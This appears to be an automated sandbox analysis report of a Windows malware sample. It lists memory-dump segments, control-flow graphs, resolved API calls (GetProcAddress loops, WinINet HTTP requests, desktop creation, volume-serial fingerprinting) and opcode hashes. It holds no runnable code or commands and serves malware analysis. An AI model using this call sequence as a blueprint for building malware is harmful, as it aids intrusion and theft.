                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: a4ced390d653aa6c7d84f64f539c7b57b03a07e0229e1814d50b789b0c057e53
                          • Instruction ID: 71f977891711f2417cf4fae20fd7bfc0861ec3882db8de8278c351543eee5c92
                          • Opcode Fuzzy Hash: a4ced390d653aa6c7d84f64f539c7b57b03a07e0229e1814d50b789b0c057e53
                          • Instruction Fuzzy Hash: FBF0B4B1A41648ABC710DF88DD49F9EBBBCF704B21F000217F915E3280D774190487A1

                          Control-flow Graph

                          • 633 3c66e0-3c66e7 -> 634, 635
                          • 634 3c66ed-3c6af9 GetProcAddress * 43 -> 635
                          • 635 3c6afe-3c6b92 LoadLibraryA * 8 -> 636, 637
                          • 636 3c6c08-3c6c0f -> 638, 639
                          • 637 3c6b94-3c6c03 GetProcAddress * 5 -> 636
                          • 638 3c6c15-3c6ccd GetProcAddress * 8 -> 639
                          • 639 3c6cd2-3c6cd9 -> 640, 641
                          • 640 3c6d4f-3c6d56 -> 642, 643
                          • 641 3c6cdb-3c6d4a GetProcAddress * 5 -> 640
                          • 642 3c6d5c-3c6de4 GetProcAddress * 6 -> 643
                          • 643 3c6de9-3c6df0 -> 644, 645
                          • 644 3c6df6-3c6f0b GetProcAddress * 12 -> 645
                          • 645 3c6f10-3c6f17 -> 646, 647
                          • 646 3c6f8d-3c6f94 -> 648, 649
                          • 647 3c6f19-3c6f88 GetProcAddress * 5 -> 646
                          • 648 3c6f96-3c6fbc GetProcAddress * 2 -> 649
                          • 649 3c6fc1-3c6fc8 -> 650, 651
                          • 650 3c6fca-3c6ff0 GetProcAddress * 2 -> 651
                          • 651 3c6ff5-3c6ffc -> 652, 653
                          • 652 3c70ed-3c70f4 -> 654, 655
                          • 653 3c7002-3c70e8 GetProcAddress * 10 -> 652
                          • 654 3c70f6-3c714d GetProcAddress * 4 -> 655
                          • 655 3c7152-3c7159 -> 656, 657
                          • 656 3c716e-3c7175 -> 658, 659
                          • 657 3c715b-3c7169 GetProcAddress -> 656
                          • 658 3c7177-3c71ce GetProcAddress * 4 -> 659
                          • 659 3c71d3
                          APIs
                          • GetProcAddress.KERNEL32(77190000,00F165F8), ref: 003C66F5
                          • GetProcAddress.KERNEL32(77190000,00F16738), ref: 003C670D
                          • GetProcAddress.KERNEL32(77190000,00F29850), ref: 003C6726
                          • GetProcAddress.KERNEL32(77190000,00F297F0), ref: 003C673E
                          • GetProcAddress.KERNEL32(77190000,00F29808), ref: 003C6756
                          • GetProcAddress.KERNEL32(77190000,00F2D258), ref: 003C676F
                          • GetProcAddress.KERNEL32(77190000,00F1A698), ref: 003C6787
                          • GetProcAddress.KERNEL32(77190000,00F2D1C8), ref: 003C679F
                          • GetProcAddress.KERNEL32(77190000,00F2D0C0), ref: 003C67B8
                          • GetProcAddress.KERNEL32(77190000,00F2D2D0), ref: 003C67D0
                          • GetProcAddress.KERNEL32(77190000,00F2D318), ref: 003C67E8
                          • GetProcAddress.KERNEL32(77190000,00F16778), ref: 003C6801
                          • GetProcAddress.KERNEL32(77190000,00F16798), ref: 003C6819
                          • GetProcAddress.KERNEL32(77190000,00F167B8), ref: 003C6831
                          • GetProcAddress.KERNEL32(77190000,00F167D8), ref: 003C684A
                          • GetProcAddress.KERNEL32(77190000,00F2D348), ref: 003C6862
                          • GetProcAddress.KERNEL32(77190000,00F2D168), ref: 003C687A
                          • GetProcAddress.KERNEL32(77190000,00F1A508), ref: 003C6893
                          • GetProcAddress.KERNEL32(77190000,00F167F8), ref: 003C68AB
                          • GetProcAddress.KERNEL32(77190000,00F2D198), ref: 003C68C3
                          • GetProcAddress.KERNEL32(77190000,00F2D228), ref: 003C68DC
                          • GetProcAddress.KERNEL32(77190000,00F2D1E0), ref: 003C68F4
                          • GetProcAddress.KERNEL32(77190000,00F2D1B0), ref: 003C690C
                          • GetProcAddress.KERNEL32(77190000,00F16818), ref: 003C6925
                          • GetProcAddress.KERNEL32(77190000,00F2D120), ref: 003C693D
                          • GetProcAddress.KERNEL32(77190000,00F2D2E8), ref: 003C6955
                          • GetProcAddress.KERNEL32(77190000,00F2D300), ref: 003C696E
                          • GetProcAddress.KERNEL32(77190000,00F2D288), ref: 003C6986
                          • GetProcAddress.KERNEL32(77190000,00F2D138), ref: 003C699E
                          • GetProcAddress.KERNEL32(77190000,00F2D2A0), ref: 003C69B7
                          • GetProcAddress.KERNEL32(77190000,00F2D330), ref: 003C69CF
                          • GetProcAddress.KERNEL32(77190000,00F2D360), ref: 003C69E7
                          • GetProcAddress.KERNEL32(77190000,00F2D078), ref: 003C6A00
                          • GetProcAddress.KERNEL32(77190000,00F1FD40), ref: 003C6A18
                          • GetProcAddress.KERNEL32(77190000,00F2D150), ref: 003C6A30
                          • GetProcAddress.KERNEL32(77190000,00F2D270), ref: 003C6A49
                          • GetProcAddress.KERNEL32(77190000,00F16838), ref: 003C6A61
                          • GetProcAddress.KERNEL32(77190000,00F2D090), ref: 003C6A79
                          • GetProcAddress.KERNEL32(77190000,00F16878), ref: 003C6A92
                          • GetProcAddress.KERNEL32(77190000,00F2D0A8), ref: 003C6AAA
                          • GetProcAddress.KERNEL32(77190000,00F2D0D8), ref: 003C6AC2
                          • GetProcAddress.KERNEL32(77190000,00F16898), ref: 003C6ADB
                          • GetProcAddress.KERNEL32(77190000,00F168B8), ref: 003C6AF3
                          • LoadLibraryA.KERNEL32(00F2D0F0,003C051F), ref: 003C6B05
                          • LoadLibraryA.KERNEL32(00F2D108), ref: 003C6B16
                          • LoadLibraryA.KERNEL32(00F2D1F8), ref: 003C6B28
                          • LoadLibraryA.KERNEL32(00F2D180), ref: 003C6B3A
                          • LoadLibraryA.KERNEL32(00F2D240), ref: 003C6B4B
                          • LoadLibraryA.KERNEL32(00F2D210), ref: 003C6B5D
                          • LoadLibraryA.KERNEL32(00F2D2B8), ref: 003C6B6F
                          • LoadLibraryA.KERNEL32(00F2D618), ref: 003C6B80
                          • GetProcAddress.KERNEL32(77040000,00F162F8), ref: 003C6B9C
                          • GetProcAddress.KERNEL32(77040000,00F2D600), ref: 003C6BB4
                          • GetProcAddress.KERNEL32(77040000,00F29308), ref: 003C6BCD
                          • GetProcAddress.KERNEL32(77040000,00F2D450), ref: 003C6BE5
                          • GetProcAddress.KERNEL32(77040000,00F16438), ref: 003C6BFD
                          • GetProcAddress.KERNEL32(73E30000,00F1A5A8), ref: 003C6C1D
                          • GetProcAddress.KERNEL32(73E30000,00F16398), ref: 003C6C35
                          • GetProcAddress.KERNEL32(73E30000,00F1A6C0), ref: 003C6C4E
                          • GetProcAddress.KERNEL32(73E30000,00F2D3A8), ref: 003C6C66
                          • GetProcAddress.KERNEL32(73E30000,00F2D408), ref: 003C6C7E
                          • GetProcAddress.KERNEL32(73E30000,00F16518), ref: 003C6C97
                          • GetProcAddress.KERNEL32(73E30000,00F16138), ref: 003C6CAF
                          • GetProcAddress.KERNEL32(73E30000,00F2D5B8), ref: 003C6CC7
                          • GetProcAddress.KERNEL32(768D0000,00F16158), ref: 003C6CE3
                          • GetProcAddress.KERNEL32(768D0000,00F161B8), ref: 003C6CFB
                          • GetProcAddress.KERNEL32(768D0000,00F2D5D0), ref: 003C6D14
                          • GetProcAddress.KERNEL32(768D0000,00F2D540), ref: 003C6D2C
                          • GetProcAddress.KERNEL32(768D0000,00F16278), ref: 003C6D44
                          • GetProcAddress.KERNEL32(75790000,00F1A7D8), ref: 003C6D64
                          • GetProcAddress.KERNEL32(75790000,00F1A530), ref: 003C6D7C
                          • GetProcAddress.KERNEL32(75790000,00F2D498), ref: 003C6D95
                          • GetProcAddress.KERNEL32(75790000,00F16198), ref: 003C6DAD
                          • GetProcAddress.KERNEL32(75790000,00F16318), ref: 003C6DC5
                          • GetProcAddress.KERNEL32(75790000,00F1A918), ref: 003C6DDE
                          • GetProcAddress.KERNEL32(75A10000,00F2D4E0), ref: 003C6DFE
                          • GetProcAddress.KERNEL32(75A10000,00F163B8), ref: 003C6E16
                          • GetProcAddress.KERNEL32(75A10000,00F292B8), ref: 003C6E2F
                          • GetProcAddress.KERNEL32(75A10000,00F2D3C0), ref: 003C6E47
                          • GetProcAddress.KERNEL32(75A10000,00F2D5E8), ref: 003C6E5F
                          • GetProcAddress.KERNEL32(75A10000,00F16358), ref: 003C6E78
                          • GetProcAddress.KERNEL32(75A10000,00F16418), ref: 003C6E90
                          • GetProcAddress.KERNEL32(75A10000,00F2D420), ref: 003C6EA8
                          • GetProcAddress.KERNEL32(75A10000,00F2D3D8), ref: 003C6EC1
                          • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 003C6ED7
                          • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 003C6EEE
                          • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 003C6F05
                          • GetProcAddress.KERNEL32(76850000,00F161D8), ref: 003C6F21
                          • GetProcAddress.KERNEL32(76850000,00F2D630), ref: 003C6F39
                          • GetProcAddress.KERNEL32(76850000,00F2D4B0), ref: 003C6F52
                          • GetProcAddress.KERNEL32(76850000,00F2D570), ref: 003C6F6A
                          • GetProcAddress.KERNEL32(76850000,00F2D648), ref: 003C6F82
                          • GetProcAddress.KERNEL32(75690000,00F16378), ref: 003C6F9E
                          • GetProcAddress.KERNEL32(75690000,00F16338), ref: 003C6FB6
                          • GetProcAddress.KERNEL32(769C0000,00F163D8), ref: 003C6FD2
                          • GetProcAddress.KERNEL32(769C0000,00F2D660), ref: 003C6FEA
                          • GetProcAddress.KERNEL32(6FB00000,00F161F8), ref: 003C700A
                          • GetProcAddress.KERNEL32(6FB00000,00F16458), ref: 003C7022
                          • GetProcAddress.KERNEL32(6FB00000,00F163F8), ref: 003C703B
                          • GetProcAddress.KERNEL32(6FB00000,00F2D3F0), ref: 003C7053
                          • GetProcAddress.KERNEL32(6FB00000,00F16238), ref: 003C706B
                          • GetProcAddress.KERNEL32(6FB00000,00F16258), ref: 003C7084
                          • GetProcAddress.KERNEL32(6FB00000,00F16298), ref: 003C709C
                          • GetProcAddress.KERNEL32(6FB00000,00F16218), ref: 003C70B4
                          • GetProcAddress.KERNEL32(6FB00000,InternetSetOptionA), ref: 003C70CB
                          • GetProcAddress.KERNEL32(6FB00000,HttpQueryInfoA), ref: 003C70E2
                          • GetProcAddress.KERNEL32(75D90000,00F2D4F8), ref: 003C70FE
                          • GetProcAddress.KERNEL32(75D90000,00F29418), ref: 003C7116
                          • GetProcAddress.KERNEL32(75D90000,00F2D510), ref: 003C712F
                          • GetProcAddress.KERNEL32(75D90000,00F2D378), ref: 003C7147
                          • GetProcAddress.KERNEL32(76470000,00F162D8), ref: 003C7163
                          • GetProcAddress.KERNEL32(6D780000,00F2D390), ref: 003C717F
                          • GetProcAddress.KERNEL32(6D780000,00F16478), ref: 003C7197
                          • GetProcAddress.KERNEL32(6D780000,00F2D438), ref: 003C71B0
                          • GetProcAddress.KERNEL32(6D780000,00F2D558), ref: 003C71C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 62580ca970e61cce1710b86d8ce2030603c307042c0a68ac14e414d9afb7e140
                          • Instruction ID: 00f1b9b2d1c239967e5eac8fc1e95838c5f3dc8c7a403184ba807a13b47fa3b4
                          • Opcode Fuzzy Hash: 62580ca970e61cce1710b86d8ce2030603c307042c0a68ac14e414d9afb7e140
                          • Instruction Fuzzy Hash: 18623CB5613201AFD774DF65FC8CA2637BAF7A8201314891BE956D3364DB34A848FB60
                          APIs
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF1D5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF1F1
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF1FC
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF215
                          • lstrlen.KERNEL32(003CCFEC), ref: 003BF220
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF239
                          • lstrcpy.KERNEL32(00000000,003D4FA0), ref: 003BF25E
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF28C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF2C0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BF2F0
                          • lstrlen.KERNEL32(00F16598), ref: 003BF315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 1c1ba5b345b4fc062b1b71df569571ce595a105088639f07bd9b214000c73b38
                          • Instruction ID: 0b39cee28b3d06a9fae62e81c4519d3b884d24e3d6bd7b36c6f852fef71c5990
                          • Opcode Fuzzy Hash: 1c1ba5b345b4fc062b1b71df569571ce595a105088639f07bd9b214000c73b38
                          • Instruction Fuzzy Hash: 07A28130A012069FCB26DF69DC48AAAB7F5EF45308F19907EE909DBA61DB31DC45CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0013
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C00BD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C00E1
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C00EC
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0110
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C011B
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C013F
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C015A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0189
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C0194
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C01C3
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C01CE
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0206
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C0250
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0288
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C059B
                          • lstrlen.KERNEL32(00F165D8), ref: 003C05AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C05D7
                          • lstrcat.KERNEL32(00000000,?), ref: 003C05E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C060E
                          • lstrlen.KERNEL32(00F2ECC8), ref: 003C0625
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C064C
                          • lstrcat.KERNEL32(00000000,?), ref: 003C0658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C0681
                          • lstrlen.KERNEL32(00F166B8), ref: 003C0698
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C06C9
                          • lstrcat.KERNEL32(00000000,?), ref: 003C06D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C0706
                          • lstrcpy.KERNEL32(00000000,00F29438), ref: 003C074B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C077F
                          • lstrcpy.KERNEL32(00000000,00F2ECE0), ref: 003C07E7
                          • lstrcpy.KERNEL32(00000000,00F29248), ref: 003C0858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 003C08CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C0928
                          • lstrcpy.KERNEL32(00000000,00F290B8), ref: 003C09F8
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A2528
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A254E
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A2577
                          • lstrcpy.KERNEL32(00000000,00F29198), ref: 003C0ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C0B81
                          • lstrcpy.KERNEL32(00000000,00F29198), ref: 003C0D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: ba6ef11e35ba1d86692de2c2b48291ffd33822ff736913c597836d43dafa1005
                          • Instruction ID: 11600615e50263f3d5321d91b9d9280714a11124ad91e151f7ea72465e2eea61
                          • Opcode Fuzzy Hash: ba6ef11e35ba1d86692de2c2b48291ffd33822ff736913c597836d43dafa1005
                          • Instruction Fuzzy Hash: 2DE24871A05341CFD736DF29C488B6ABBE0BF89304F59856EE489CB262DB319C45CB42

                          Control-flow Graph (function 3a6c40; rendered graph not reproduced). Recoverable from the graph export: the entry block 3a6c40-3a6c64 calls subroutine 3a2930; block 3a6cc8-3a6cf5 calls InternetOpenA and StrCmpCA, 3a6d02-3a6d22 InternetConnectA, 3a6d28-3a6d5d HttpOpenRequestA, 3a6d67-3a6d77 InternetSetOptionA, 3a6d7d-3a6dad HttpSendRequestA and HttpQueryInfoA, 3a6dee-3a6e07 and 3a6e61-3a6e8b InternetReadFile, with InternetCloseHandle at 3a6e8d, 3a6e94 and 3a6ea1 on the exit paths.
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6C6F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6CC2
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A6CD5
                          • StrCmpCA.SHLWAPI(?,00F2F170), ref: 003A6CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A6D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,00F2ED88,00000000,00000000,-00400100,00000000), ref: 003A6D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003A6D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A6D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 003A6DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003A6DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 003A6E7D
                          • InternetCloseHandle.WININET(00000000), ref: 003A6E8E
                          • InternetCloseHandle.WININET(?), ref: 003A6E98
                          • InternetCloseHandle.WININET(00000000), ref: 003A6EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 8ae90e1660d59117c9403bc44a6fa633bec0bb64ab11a783ffef6fd599799f9b
                          • Instruction ID: d6b5ebdd457d182ecf48a913f6bcf0dda7c10f9ace1c92817bd35381b64cfc79
                          • Opcode Fuzzy Hash: 8ae90e1660d59117c9403bc44a6fa633bec0bb64ab11a783ffef6fd599799f9b
                          • Instruction Fuzzy Hash: BA81C275A11216ABDB22DFA4DC4AFAF77B8EF55700F05402AF905EB280DB70AD04CB90
                          APIs
                          • lstrlen.KERNEL32(00F16598), ref: 003BF315
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF47B
                          • lstrcpy.KERNEL32(00000000,00F16598), ref: 003BF4BB
                          • lstrcpy.KERNEL32(00000000,00F29348), ref: 003BF4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003BF61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BF718
                          • lstrlen.KERNEL32(00F29358), ref: 003BF746
                          • lstrcpy.KERNEL32(00000000,00F29358), ref: 003BF771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF793
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BFA32
                          • lstrlen.KERNEL32(00F29378), ref: 003BFA60
                          • lstrcpy.KERNEL32(00000000,00F29378), ref: 003BFA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BFAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BFAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 55c63f7408874de6d779d877baa3bcce884491350bdf76029baabe9186e2a873
                          • Instruction ID: 6873a145e76a72d864d510b2973fda42c2b9992d0a568d69bcdac695486c3a14
                          • Opcode Fuzzy Hash: 55c63f7408874de6d779d877baa3bcce884491350bdf76029baabe9186e2a873
                          • Instruction Fuzzy Hash: 63F13D70A02202CFDB26DF69C844AA6B7E5BF54318B1A91BED509DBB61DB31DC46CF40

                          Control-flow Graph (function 3b8ca0; rendered graph not reproduced). Recoverable from the graph export: the entry block 3b8ca0-3b8cc4 calls StrCmpCA; one successor, 3b8cc6-3b8cc7, calls ExitProcess, while the other fans out from 3b8cff into a series of blocks (3b8d06 through 3b8e9a) that each call StrCmpCA or lstrlen and converge at 3b8ec3-3b8edc, with a final lstrcpy at 3b8ebb-3b8ebd.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 6721beef599b537b8b526fdd504b78f2a6fd9d22a4be94c10e7cc13df27fe59f
                          • Instruction ID: 212f91645d6d6881541ef18d7c6313119362c7d13016b8f4326b489cc6e88f56
                          • Opcode Fuzzy Hash: 6721beef599b537b8b526fdd504b78f2a6fd9d22a4be94c10e7cc13df27fe59f
                          • Instruction Fuzzy Hash: 02517071A09701ABC722AF75ED88AAB7BFCBB54708B10481EE642D7E10DB74D445DF60

                          Control-flow Graph (function 3c2740; rendered graph not reproduced). Recoverable from the graph export: 3c2740-3c2783 calls GetWindowsDirectoryA, 3c278c-3c27ea GetVolumeInformationA, 3c2809-3c2820 GetProcessHeap and RtlAllocateHeap, 3c2826-3c2844 wsprintfA, and the paths join at 3c285b-3c2872, which calls subroutine 3c71e0.
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003C277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003B93B6,00000000,00000000,00000000,00000000), ref: 003C27AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2816
                          • wsprintfA.USER32 ref: 003C283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: 6160d760d7b1e5f751e1a2696bf875a3462479634f8da44de64ef6c56e54dc3f
                          • Instruction ID: cc43893e75ac1fc201365441960fb81110db23d1aec922bc0744d13e07e24d30
                          • Opcode Fuzzy Hash: 6160d760d7b1e5f751e1a2696bf875a3462479634f8da44de64ef6c56e54dc3f
                          • Instruction Fuzzy Hash: EC316DB1909209AFCB15DFB89985AEFBFBCEF58710F10016EE505F7650E2349E408BA1

                          Control-flow Graph

                          control_flow_graph 2793 3a4bc0-3a4bce 2794 3a4bd0-3a4bd5 2793->2794 2794->2794 2795 3a4bd7-3a4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 3a2a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 003A4BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003A4C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003A4C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 003A4C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 003A4C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
